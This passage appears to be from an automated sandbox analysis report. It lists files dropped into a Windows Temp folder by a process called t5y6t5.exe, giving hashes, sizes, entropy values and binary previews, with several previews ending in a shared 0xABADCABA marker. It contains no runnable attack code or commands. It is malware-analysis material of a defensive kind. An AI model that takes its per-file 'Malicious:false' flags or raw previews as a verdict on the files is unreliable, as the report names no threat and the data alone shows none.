                                                                                            Preview:./Y..tR.]..dW.4zP.@w.N.D......(.%..FY..`.....||...C.j..D^ ..^.I........&.3..9../.%..7......^......!........bv..P..O..3.. E.....q.."'g..d.(..,c.E.....n.6.....W..PK.../hm.....,....$....k8X.i..;K..k..v...:.KJ=.~..=...Ks..=K..t]c.b..u#(.n..];.z.....@."U..S.:`..M.H..\%M... p...E..Y@[..$.~.G.......j.t...7...wx..iN.=Y<Qz..N..f....%\.0*.w...Y......xa.Kv..E/.n.....pB..n.h.I.....R]._8.b.n....nYS....$.k.%..V.1Z,...x$.j...A..b..:.....M..[..e...B..c..j.....5.e"..9.....F..}.e=.N......k/....^.....n2%..k...p.mm...3]....X.I....Ac........Fk.zy$..riS3Z...{P.?sygj`.A..)!.<.Q..9.5.[....2P.T..0Ut5.rT.[b...\]....H_u..x8.j...X.,1..x;)..u...H.<..t..Q.Y...J@(Q='.j}6z.d...+......k..j=.cY...X@ .,$K.a7.{..<^..8G..i..=.[5m.F.....L.\~.......C!..v<..Et..zK..I....Y...8..A....[n.G......(.O..48.....(....~Kfd....... ..(.:..f.F.1&Rl.....K.r{....1..0.h...\{g....dX.....r..%=N#B..B..O.F.t..fj.7...v.1D.U...;]J.nw........$8.....9..#.........u.......+....D.S....Gm.U....}../....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):37050
                                                                                            Entropy (8bit):5.9022029947305095
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:XAPKV23MHAH2+SbfIluoW4BvlUNoXzFS5jp:XASk8gWLAPxBvlUNoXzFS5l
                                                                                            MD5:E2C63EEDC9E44860D9CDF9417E417068
                                                                                            SHA1:9F7B2D1A457C333C5C5ECE5AB805B2F7D85DD466
                                                                                            SHA-256:02166223468A4356A31A28B080E4D152CEA7A7D062B6A0C4362C933F735C2848
                                                                                            SHA-512:69A936C7702EAB99B427E79219CEA3EA5D8013EC37BBDE9C785C426E6DF993A13FB2E9AEADAD262C9D68689EAB4D979727C5653FE4433199EAA34FA1A05ED51B
                                                                                            Malicious:false
                                                                                            Preview:>].....D..c..........^y`.}.&..e..1F.7h.V.Y..V4.b...!.,...n=.-..rAqT..N....."e.^..{.<l........t......}.*..(FH.*........h7(81...q....#....6(....j.N..u5(....aX.SV..m......sgskj....&.m.8.f.:&}..[...M.....f...Q[5[#../.]<xs...F9.i.z..13...N)O..H<...........;?..^..yz.,.4Sa.'.E-.m<...X..:..p...c.....2.x........2.%.....J.0 h...PZ.X..q[j ....f!f......../R/......9.z..L..pR.@G...L.3......p.qzA_L8.."....G9..M...[....#....E......l.5..].1...S!.{.A.r...3..G.4.)$..v...7..........].c...oglu....Q.h.....k..Xb..,.fDnm.v.Q.....H.a...-...G..h\.L...?..~Q..S.._T+tM...P(iL..X...P.o.9B#..@..PD.(..8[....'.^..rr.Wll....V.......#U:"..`4N.H.?s.l..$...*.1(..c^.....j<A. .Cg.....+R.Ub..L.._.:K.& :B..mW..C.*0Z'.[2........9'#W(...o.....a.b.r3n[=.......Oy/..R.C...{.qX.....p.[.w.i..P.h_.)6.........j...t...5j.4..@or....W.Y..z.M....dX0..7S}..+...p..q.L..z..zOM.AT../%....y....1........{0...rNR..YH....G=.).../{...*.z9.@.*.p............C.._#..9. ...q.!..tk.h...L...*4~..R.a..i6.#W.&.g.2,
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):758
                                                                                            Entropy (8bit):7.7508797977508435
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:QBcR4Miaw72RY16I+TgvkXa94xtG9AJg/L2+Vx6q8rLBn:xij78Mt+UvkXJxEiJg/6ix6q8rl
                                                                                            MD5:C6C50CC9EE4AD6263E19CADDA6952BB3
                                                                                            SHA1:EC1352935A0657380B34AB5C824048C7A3D926D6
                                                                                            SHA-256:C4A21CA144999E57A89EC59EB92FBDC4CE8382E8A091BA918AAB0E1086A7B81B
                                                                                            SHA-512:8B4802A96BD8F6604439DE3EA4180753FABF732C839626EBA09223CD56E8334B031D48DB388F83BAC9634FF80426CBB0B01867FE7E42AABC10F7DC6987D0C671
                                                                                            Malicious:false
                                                                                            Preview:......<9|..7.">......%,U)O.3..6./..X.9...rE..ni../B..-7...1.j.X....X..<.z.....#..L..........4.Pj{.H..K-...F..,c...%DR..|'.w.....n.Xcz..X.S...}..1H..."..F..".h%.v...f...S`.3.*..(!j0.L.69F.....cM.H...-......O.P./.."2.y~..}..@.........T...q.J..mR......r.l..UpfR..2..'E..+r..-.vi5....iyHm...)..y;2.c.......[. ..D..T9....z..ub...L...z.T...G.o.....iR......)....6....K.....&..$86.....,...Jm>`%..N%...~u.B.\.N+=...e..nI!.W>....[.hH..d1.g....Z...-?d.....`_........".2.1fbfafe8fb"}e.T..U!8f......k..E..K..P....o3kc...F:uH...l.l8.E.....t...EsW...r..E......P......@T@G...J.?.......s...9...1...+e8+..@.<...^^4<.Y.:ho.......D....aT.>..G)..K...gV..X.. .E..&yG$)+H.]..SA.]...B ......<...nQ2....<-....!4........P.9.pf.....>j.y3G@....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):615
                                                                                            Entropy (8bit):7.671604260181986
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:ihHIvnZWmYGajFEx9sLqME+yMz3ffqLZeQk6u7KbAKn:ihWWmYnj+LsLq3+ymPfq1Q6cK
                                                                                            MD5:F33BEEAFE90655856CB4BFB7EA1C7F19
                                                                                            SHA1:BB3C10301AB0DDBDF2071353BB799CC726320E41
                                                                                            SHA-256:6503001C27DA59A1D1E36E674B19F17C543E786683566704628D7C3E8DFDC165
                                                                                            SHA-512:B7821BE6A5C6CF4370FA710E1A45F9B5C6DE1C34BC83A096B9962289E5AFA0EC9EBF149A0C8CC7888124C2735921379EE55C84AACC46A506C0FC4D7708B802ED
                                                                                            Malicious:false
                                                                                            Preview:>.giB`...o.,..M.S......0HB..._....ce.%j...\......t...|z...gB..6....I..>.mK...>..zo....>D.L.6.....V....s...T,.~...!.|.`.t.7eN.2..PP.rp..j.QI[d..C<...(.....i}.....'0..'......E..<...GQ..XR#../...cF..t.....%.p`..qb..q.'.a..t..t.q.#.`...._...n.../.....U.vI.b..v.....<...'....Hj........W=a.)./B."g+IN+L..".Y..Al..C..d..3..O#.0...Iz..Plt"}}}.g.[.....n.b..M...].*?a.zw...._\.C.E..H...g..>....."..m.,V..6X.4JS.....L....O.....n...2.6..uH.2=.-.......oH...........B-?Qz..M6m._4. vs......+.lD...d[k. ...rUA......&..&.3...Re..`.7.n....z.*{.lM.......2<i....7'......n5 D.;#..g>...md..].zh....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):554
                                                                                            Entropy (8bit):7.625873318124503
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:+ZBjWi7zGAXDO8V+3PzUjP0Qp022emGnWAGyIEjV8hIdFiHeiEz3J0BG5vCm0xgQ:+ZvffIPzg08fyyDGhrcz39vCh0b9iLn
                                                                                            MD5:6062BB63670A8624EBCA29AC26880CE1
                                                                                            SHA1:CA708AC6DC147863D39707806F1C063DCC3CA6A4
                                                                                            SHA-256:0E28724F57BC94909E45110F444BFD1AD4E9ADE3AE37358262AB55B97B93C129
                                                                                            SHA-512:2A1FB81F992092B4509B24DADD67F0B596F244CCF71CD6A38531E5B0CFA32578BFC7D64C45C9353393D4814EE6266D27381D5BD94B857745EF1C87F035748662
                                                                                            Malicious:false
                                                                                            Preview:#V....^D...f...i.875.......V.N...lXO....uj.q.~_......p$...........8..h._.n.I....E..."U"7...V..'y<..WI....o5.9Y......!....[Ki..l.e.]..v.?..|......D...e.7....9>.X....;5......GE%M.=q..-...z....../..'n...*BCZ.0..l.;Y.*.).....@/n..U.g..^.'.-.RgE...&X.T. .b......-complete":true}`P......lg=~.*<...%..z#..p....;z/_p...Yk-...$.DU..P....:. z..7..BX..1..I...$~{.0.U..h.;.o.W.......Wb..vW..P..s...V.4...>.._P.....h....<.Wz..J...p.a.*..<.6.\9.U...jg...g.0.].#.j..R.?..>.6XZ......k......Sv..O....."LW.IK.Z)..`N......]..H..4...;.K..#.y0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1570
                                                                                            Entropy (8bit):7.8645857817374205
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:h0JZq8CSqT52s8ovC1JvRIo9665bcV1s4b1dl0NOdGM8lkGx3ys4i4dFLw:+JZq8Cd2s8oo+bXCgEMIhd4pLw
                                                                                            MD5:EDEC057A808C5A500A12EC3170CECF53
                                                                                            SHA1:3F6D744E5906B2FEB8654EED25BFC2DFBBF60318
                                                                                            SHA-256:63F1A571CC3D8E66D3BB64B6CB9310C924D88EDA2F9C4291AD925457066C571B
                                                                                            SHA-512:F08B5FEA94C0020F51E68ED6C0ED0CE402055412E773E0E811F61E7CE8BF1A1DD3186E96CC8811E66691993A85BB2A5B16481A17FBC3EF1A168D7CCC6779D66A
                                                                                            Malicious:false
                                                                                            Preview:..e0~.oo .@...".R.Ki"..!.]%..'.U..f.O..g._../....&......-L.'v.Ea#v]...Y.......m.....r..7.s.....g~|+....j........C..R6.Z..Ns.w.l...x.......[sH......h.9....5..R.....\z..2N...|.\.koG..(....Y..~.L*.#..S.gt.Y....HQ.N....s....G. c.%w.K.......R.$.R.i.7..qe.....~.V..S.`..n.+K..r"R.....0h]...5.<;.....6.W.^..&...........>'.ii>.e.....4..hf;s..R./.\.W.....n'.F.GV.#L.Z..f.....&.-..].aD....{.....f..:.....9Q(9e..~.6.um?<...F..p.{.m.e}..?U..W@jI...^'j@J>.B.5..s.L..z?.Q.On..lK...L.........!.t.s.....P]...A=ez.U...6HP..D....Z0....}.kR.F...(E...+.m...5/...=..KvI..%.Rz....{.......r........i.......H..&.+..n....V.u..$...O^{OnK...].A .g.....o....*.f!'(w..P.T.'.j.7.5.....0.9p>.H......*..*....u...P..ke.+..Gv!f.....X...I5j.,.0..0.D...2.A.5...cJ...[..v.B\..P}..........\.i}.>...7....L$....R....Ox.+J.......?...J.......r.)...Y=..s........{^.%q...vu=..p>....q.5a.....3s$&.I9+7..|.=[.\=i...J...8......5Gu<.`...p..j..Q-..B..Y.{.......7.E.Qr...x.M$.}.....6..8c.})f34D#..]..@
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1570
                                                                                            Entropy (8bit):7.887928970169808
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:u4EWrTTFi5WD69AKPQcQGpPBqEi2PZjyTZ:u4EWfTsBANGpPlZjyZ
                                                                                            MD5:2218315F99176BDB7139C284D1B117E4
                                                                                            SHA1:4ECE09B0AD4E7E0A0D4429B5FE6A566B98C451D6
                                                                                            SHA-256:FBC4AEF7B597BCC7A41657301F1C875304095FCB92498D682351FDDB6D7FBAB9
                                                                                            SHA-512:C88A7D47BAFB38B76DEF4CE49C3A548144F40AC3574D68DB5208EFB03FAA3728AF7829E7FE74E55D2B5FF02343A68F082CBE4551625C128EECDC99CB485567F9
                                                                                            Malicious:false
                                                                                            Preview:!.."...}..tpk...n..DW|_.LiFc.o..T..`_-..c.@.........Z3Tg.f....%.U.H0TY..;.....8.\Dh?..`wh.3...+.rj.O..%/k.fO..(5....b..C...../.U...^[1..P.../..1.'.G.....d.<.W..AS...\.)fU...Y.J.N..9.e.(.H.F.T.....d.!.G..KnU.1..h.J.f.R+...V.u..IF.?.tD.....%B..\W..>5.....o.9.(KG.=.3.6..{..(.{.b......L.....v....U.y......U.[....{ 4..x....0.........?.....,..iw*....F.R..B..2...6.moX$.m.e,d.?....R`.9L...~#..H./L.-.^..f....."4.t.A.KT...B.^..........-.....U...hH.........b..6.....u..u$..F<..|..x..g.C"...z.b.^.qV.r..H.5...n.d.x(-.'Mw...z..(.0....LH...5. ..`t.....9.8.=.......9;..9FB....]T,}....V|.......Oey......7j)....,f.....H..[.<...9..^..X..F.m.3...J.....|p\...ZX."..z%.......v..........u..=QT.Eb.....Ol..9.k/..._.J...!l.wH.o..*R.L.......fsQ.ULC)W...5s.m..x|aJ.mI(=%.Q..Up.Nd.)....?@!..6..@A.......M..R.i).......Pe@{....j#=...Dm...D..8.{s...5....T....."]..v1...".&. ..|....P.NE5....'...e\p..K...U.&.i>jl...;...2.....n[.<.n`F..i....O.~.4..|.}P]y|.1C..6.+sr.. ...!f..r.H....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:OpenPGP Public Key
                                                                                            Category:dropped
                                                                                            Size (bytes):1483
                                                                                            Entropy (8bit):7.880136904050243
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:aRHh9XIHK/UVjbk01AfCS06GbrSv0saQ+Cf9r2Uxo9IE7kG4IfQgnhSdhQjER:alh9XCRVX/GfJ0/a2Cf9r2Uxo9XkGnfa
                                                                                            MD5:F88A90EE371E903E58EEDADF4B32F6C0
                                                                                            SHA1:0B7AA04086F7699D2A347A813859FF94E92EBFEF
                                                                                            SHA-256:A4BD8C73F0491726E8EDF06B7F6E65EEC81E588A77EB76EF1B8D7E687F46D844
                                                                                            SHA-512:C9F074440D21EAA9EAF389813FEBF55A5882145ED1D63D55BC8657ACCE8BB480B6A0FEA978863FDD4B214725311CE7ED8FE899840497BDC39A91002FF8B8385F
                                                                                            Malicious:false
                                                                                            Preview:.....W.@.....A.4.>D.{.}..@c.W..C./......".\lo.=eV.m.-..j.I.3...5..t.p...LgU$./...".BP.[.x..ln..\l..be%..nb.T..Hx.......?).Wl.$..Fn....u.YS..L..j.O7...x......`0Js....[....|.O=x...+.y...=O[C....Z...2uo......K..t.5.).3...C...w.2........x.7WK....\.}s.L...B#..M.......3..a..H.X..wY....*.{*ny..O.?.k.....F..G......,..W.^=.....b.....T7.6.[).fX<..{........2...l..#....mu]..;z.7...cKt..f..L....J=J.....60......>.O3.a.;;$...`.;....tg....g.[r.)..........3.B7CB7...{E-.[>.. #....u.".V../........w.T..:.....jP.$.....JOB..+,...P.w.j.$...7...D.."......Z......M..X.R.[.S:g?4k..*..S....B.n......8.>].<x.3.).y>.....!...M......nGq......U.2.7.iHs..&...." .>..iv..Qo.h.......r....-6..M....~.o+.J......./~...g.SQjW.W6#."..t...i..Ld.[.`...........X.rz.G.Q......u..wF.yT..i..SV.-.ju.+.!.......h...L..Izf.a..6.3.....b........,...xqQ..WJ.A.. ...~..U..V.[/..m..S.....g.,9}a.<..a.vs...T..Cx..k..4_c.....,(...#......q..<..K{..........>....<0..a..i!o3..<..j.b[m).a...).(.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):284
                                                                                            Entropy (8bit):7.17980952084318
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Pb6AwFQlFCrNZcaGXIW4vct52fqOf0wni5GNzS4oJmHn:DkFlAYrE2tLi5G84oKn
                                                                                            MD5:A34E85C137107CEEE614659993468A94
                                                                                            SHA1:832AB4085511691D3EA4B80A81DAA475401FC51B
                                                                                            SHA-256:2FB045D780BC7562681A73707026B983BFDAB6D38A0276BB4E1E92928A535F14
                                                                                            SHA-512:8C8DB23AD77D53FB27DA5129536DD32BE6D1D2E4898D571969BBFCE4A41EB88E52A10C6A2458A01EEB02D2B6201604B6E334E8E05F86DCEADFD108A45EAEEB71
                                                                                            Malicious:false
                                                                                            Preview:E........%..L.}}X.E$@....../..D.rE.....B.<..U.af..w.....3....,..DZ.#}....V......T..@d...wu..%...w.u.....T*FHV.k..c.&!C.?^...Or+2./g..X......n\.G2C..D?....4.!.-Y.Sz...t{..e..2..._...y.*"z.H..s.tT..#h/..X....N.dRNx.........T.....V.X..l.....e....^B.e....X..&..I..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):4362
                                                                                            Entropy (8bit):7.962061466487668
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:WPefx6x9iOGinjF7Esga1C+VZw8A0unRoN7:DZ6bnlx91C6yJLRoh
                                                                                            MD5:04AD7CCFBB67EB3C030D6B14FCC07EF4
                                                                                            SHA1:F4488CFDE5532963785B716E26421D3AC9DD39EA
                                                                                            SHA-256:03E9B2BBF93046E569C8187E574E7EB3FFCD176075EE0F82161E9CD1AD4E69E2
                                                                                            SHA-512:4AFF666DD49E12D44E32CFFCD9CDE29CA07DF5A9D5D456A2C74453EBFB07B1694CBBAD268DE0E556D446DEC4551AA8AE7158BFE62057A5EE8237152ECAE003A2
                                                                                            Malicious:false
                                                                                            Preview:_X.&.."..C...1^+6XZ.+....V.....Lm...f....$.25.... ..9...,..>..F..!.6.`.Y.VR..c..T;.....X!..a}<.....9..../.{..zb".$^BH....s......o....,..V.e?....R....%..(......B":..38......8......ry..U..a..`Zn..3....MahE.=....F....Up.h..Z}.].M..1^.x..,-On'..;...3i.4...gB.].......Nm.Y.&.......+d/.....V;..K..J.$.&S.x.2.^.*...f-..Z.QR|2[.....|7.>*K.|RA.zu.:....0...W........2g.....F..x.p..d."..g./..K.G...C4......|^k....[C0.l...7SM..u.....R..X..../.@..P.}i..........'.....!..J...[F.n...\|L....r.7....M!/.9!t..1@o-64.jER...M}.L#.!....P...B.\.Hv.+.8..D}.qs...L/.)..i..i..5...J@...:......5).0{x....0......x......X}.....<e...nK.p. .5....n..bx#..*@]Q.l.gI.~j..>.....j.......L.j.*....>......<}O-B.q.........'.....!$.]S...7u..#.w........+.ZG.|*..rW........L.........T7..jD..3...je<<tZ..."(.....`I.Xb..1./..!.'......Y....gm.V.3...*!.si.m.R.9..y.u>Z...Y.P.x. ...Y..a..If...W.._.E............^.>q8...&R...(..;A...O..U.U..1...z.....}v'.Z....7\].0.....+..+v.....D......a
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131338
                                                                                            Entropy (8bit):0.5084118939904857
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:yI9NI5Z/UqGHdrsc9d+1aBAJ3HesgytkcGrCx7IK5s6bJJfC6QQyoV8snkH:yyNI5NyHFB9cgqe1c82MKSWq6XypH
                                                                                            MD5:F118DFEFAA18B0070B695177FD675D36
                                                                                            SHA1:3CC5882C85ACE0B991100555D2C91FBE093A7878
                                                                                            SHA-256:C50E289FFA8A143AE48509FCFF1FBE8C58BBB3B2D9B31DDCB2A2E4471049B489
                                                                                            SHA-512:9B61465E22569B2CD5907ED2C0192C68C429B3B4A26D0A543C30862467BE985586BA1291D0E49FBAAAEBA3543BBF0CA603784B68C699081DC62CE975F518718B
                                                                                            Malicious:false
                                                                                            Preview:v.W.Q..Z....z:.3..$..!u...,.I..N..-..}...3...6.z].S..){/t2.R.c.B.....f..A..4.t]2n.,.l...}...............T@Y..)..>h..\......./......}.lK...x...&Wbx.....$......zI...2.7...b.......pN.....}....b..q...!O..d*^......?..F@< ...ap.JO6..eKv.2.,..y]..3.[....Fc%F..K.H..G.....>...... ~.|Dp.1^[.......(.S.s...i\.;..sg..w.j....&d..9..#.4:.......`s/.W.h...l.r.m8Q..]............z ...J."<C.....$.?.)4.U.V.m.|!.Yt....W.}y.^6j..d....D8.T..5n..).Ew..C...M?<.&...$n2Z]).....^9...:yH..'..b.C.5.bW-.1.q....j.o..DE.4]R...~..v....v....@.&._...V......c.a.9&.C..H.<..=_.`..h....N.F...QH.dO.....;..*..U....qC.,...5...Y$...........e.......~.a...E......a#..vM\..f..W...]LMmg.....J..2..0..h.....&Pc.K?...~.5x ......%....[..{..I.M&.z.:E..PqD*..<3....[.k|....n...<.j.IxG'.L.?..t.V......Q..6.m.`[x.d...d......c.....gB..A....dL.lk-.w..?.y..?)i.x.;..z....|.. ...[@&wc..b.:*8.]W.'..'K..y..M..x......(..~d,`...G.kv[....7..j5g..dTWm+...#._$.).^..C.B...q.:..~!=..$_La...|...jX.W.K.'..\......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):302
                                                                                            Entropy (8bit):7.381757750855859
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Eh6y/arzavopcrWddWNPE9Bzfd37jl6cFILNR1kpkOuh3C3rBf8nPFVGQIESn:6/YzIix+dE9Z9jgcAkpkO8C3tf2VGYSn
                                                                                            MD5:CC249C3D043712A41E5857D8FC6C559C
                                                                                            SHA1:47DD57687FFEDB1C771C32FFB44853C4F05BCD07
                                                                                            SHA-256:B0FE50CDBD0B9E6972319337AB94A22184FC21D2F3D6CC6242EA6891146F3C2C
                                                                                            SHA-512:4877E67985213D7FA49BD8B351F640E71A2C69ACF2854BDF4328EBB88AAFB506B683E1597E00FEA1E140248527F7F7F5DA9C5790061682A37254346854829529
                                                                                            Malicious:false
                                                                                            Preview:.Z-|..d`3....>B...........1....ome............HztL.h_..jtY..:.........L0.*a\.....)9=.D..?e..o+.G......a..z=.o.."..K:.\6@#].........y..;..._.6....m..I...UNbRh.v.,...x.I6.......d.<...O.$G.......,.l....W%....;.(F..;...U...f"]P'!B.=.x.r3Y..Q.....]_y.f.A/.....w..7vV...p.'{...).....0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6055407368817904
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:bD0juwOW/PuGTrqQHroMgzRB03e6yD2+7u5rC4Rdy8Flmlu0ib:bIuUOiqsrobPewi+7u5r7y8vmlmb
                                                                                            MD5:3C067223708F11D508B1092D22AA32F5
                                                                                            SHA1:4A4AE0E22C9886A85A18C7704903E29E9F68C24B
                                                                                            SHA-256:08FA9CAB3C8A23D08EA174E8933FCC04C32A326571A4DE073467926F58663EB7
                                                                                            SHA-512:70C040F701FF17026956728476A4429846517AE227CED1BBB49A079E10F58F2CBA7458FE2B5E356C9FCD423F5677F9D4BD56B1EAA9C3B214F73B9BBFBB2627C9
                                                                                            Malicious:false
                                                                                            Preview:K.z.....k..:.<}....?..Nu....{w..O.M...x...K.5..._.....TXCH......*....>.....4Qb....-S...t_.._...c....]V%.GA..3.4!..cc2+...F.c.%K.a.Y...fd...8.%..K..;,...J+3...j.=|...f..fq.m.....M....0x..ct.Z~.....G..Rm5&.96...#Oh'bF....y.....y.o..y+...}.m...I#....OJ..M..i#.....3.(P.....tt.dz..w.L.Y;'M...nn.....V..C^.z.P....*.-..}.Mg..d.-........Z....%..;.W....J...z....yK..._i5...8Z....x.....N\<.2..T.. ....9.~r.zK.........(...`.l?.......:.%.0V...}.%m/.t.Q..E"....Q.....fXz?...'@.... ..L.@.~....c...D..WN.Hg..".t......P~...()%...BFlt6...E.......<........x.yF....M.F.....Y./79.*..X.....s......"?..Yk..<k...'18|....$z..8......oC.pP.........C....Q..z.T.$x.&.V.Q..o$s0.\..5..1q-...%....jM....a..o.TF../.m../....]..P.:I.L*._.Ml....gE..u..3`..O...=H..Mt.J'(.../....l.gr.]....-?.w..GPP.....].922.d8 ..A.....6..R....*.g..%D.....|`u7. D....I....z..>..x{Q^V..h..D..q..b.XQ\..2.t.O1..Rr2A.],..@.*&.K5.L.n.l.....&...d.d...1.:..%..Q.8.UD..H.c...-.e3.=...V.t...1..1.V.......Z
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.154334800299077
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:8pjk9N5Vg64XxzqAhh1H0iMs2IXt0rx07mYG2lwuHKweK:8pjk9Njglh1U3sDXGrxfYRwCKweK
                                                                                            MD5:1F3AD920A55F5E98231DFD4D4EF6F922
                                                                                            SHA1:561F8F294DA0E5AE1B2650361A6281285BDD8BD6
                                                                                            SHA-256:BC7FFA6BC1FA4296B739A6A6604DE720FD2EDAD7F6E17D9EA93EC3F113D9C092
                                                                                            SHA-512:92A60F777D9ED39000FBDF12979B3886ED09556ECEA278B1C8F833983913DD1E25D34C8FFEFDA4ABBCE1A8C5882A008654BBC6DE50BE66E61C5E29C357A61A90
                                                                                            Malicious:false
                                                                                            Preview:...g.@f.b.C..'.:.o.....tQJ[.G.f....G...Jh.juX....9>.h.}r.r...$..=...`%..........GQ.%H...UAU........U.SX..B.-...3:.f...n.2.o.b\G....Z..).......?...J..R}q6..B.....|..c..4.Cb...1.k.>...clM.....?..h..2.. va..r..4<.-t.w.t.....,z...s|...?....z'r....hox..j...h..9l^...=....U..........P.7<M...uuU......+..XF..B..`"O...{|.`+......'.O...7.o}............r4....A.!....K..K......C.A.....2b...q...!..L.~.....uN..._d...M..............Qe.....Q.......).....|.wkz\.s'*...6.R.0..cjt ......r............&..l........|..]..tl...2.."...n... .8_XJ.j]yV..A...g]0..R....)@.........K.fc...ULZ..........o......g....F.(....2M...t`.o......gB-....M.Y.Z.}..DW....(....\peC...&...ix.%.n../.l..-..YA....wE..1...4......$@.=`FX.... 6..[.C\0Zc.~.....{..mI....A(.%..Zc...7..IV....d.......)7t.@.!4}.<..T....r#....o.4k..U.[......$...."..OU~2......{..X.*@xj.@.>....;.?...~....j........n..HD"....%..............U.B.,1.;.!...o.I.NF....2..$....].C.o4T.C'.;...P..K$3No.IS........b.W..+.}.>.\F.<b.w.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):33034
                                                                                            Entropy (8bit):1.6088711737805101
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:/GKXXMJE1lUtjzUcds5XoVkb/JI1VutdCKH9zYqX6NNHNT8b8sL/Q0aBCtK7fGXK:uKsKfUVLqXV8Vu/fH9sHNTCjQ0MNEbk5
                                                                                            MD5:323AA5114686C7A93BDD420C0E704434
                                                                                            SHA1:29FC6C0860475EDCE784D79B9577E08D34860DD9
                                                                                            SHA-256:14CF36D2E30311A9C1184B9595A5241978D3C3B6C4E393C9186AB8800CD6ADDB
                                                                                            SHA-512:0D61AC7C49D2B9B88F5DFBBB497C195135DAE4917E4BB4F5351EEA8AB145B4E1B827056C2D3C123AA5A806477654F07BD5ED2D232183D17D6A44FAE16529E143
                                                                                            Malicious:false
                                                                                            Preview:=k..c............T..~..nL..g......q..&.t..h...U....D....2.:*[.> ..t..8........g..7....1.H"..9b.#.cd_;.6..6_)H.......K.x....j.B9..q.../z3O.T.(.T}z.#.R[.~#..7.[.o...VC....@.\..-....1..kp%.u...5i....n..5....6d.<&W).o...O.'....(Bp....{.....@.J?.........X..5.I.1..a..%.}..g.@|.\%.NV..m.d4.....F...h..&.....y10..@..CH8..X<..|A...j...?.6.........nL,uF..`..9..E...S.1.4^.../....+L..y.XV..5..I.$1...fc!.Wop.f.S.[5..o........?d...g.~F.......)....V..[.s.$.+..7........+...f5;.K...@kG...1.E]g...j.^..r.w..Hm....?...8X..>.g\UO...{...l..JCz...V"Y4&.T:...D.9.K...6.u..T.... ..;x.!......o.).#<H.......O...g..E6..c.<..!..=!..q.......]...-.H..L\.."Js.....<..ia.N....a.8...f. ...&.x..OM...|.*E\+.8l.~..IH!y.....4.....8..........-. .D..WL..B.L.nFj..\B .y.y.>...^....P....[9N...........I.Q..+..>..LC#..........a*.?.......@...lx..*..+.u..'/..jC\.%r.p..Z..<.:....q.;....N..y....X0......<.R...pA....$UG...Vv.#.R..S....>...d...&.{.\^........w%.....?=.w./...h...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49418
                                                                                            Entropy (8bit):1.1769673515909067
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:9txw/Fcv4tbPWWqnN4VS/Xs+eqLUjB/9h8H+wkWbVJAVVkKEDAl:9taCvue+YjeH92PRbUVgU
                                                                                            MD5:B7F9F8AC59E6539AFE94FEA75D828439
                                                                                            SHA1:86D3DFDA348ED3884F09E33032C6899E45189AAB
                                                                                            SHA-256:D0A684EF9BFCE0C30350C5CAD6CDC1ED7192F8A84049016C77C67F885984AA49
                                                                                            SHA-512:D20889BB021FCF75ADB1D1914A982B7B63863778CCCE085EF8E61F3155402790B93F31D8C74FB9E8B8D207C2B088F4E3B80438B85E4B3FB9388EC0FD72789592
                                                                                            Malicious:false
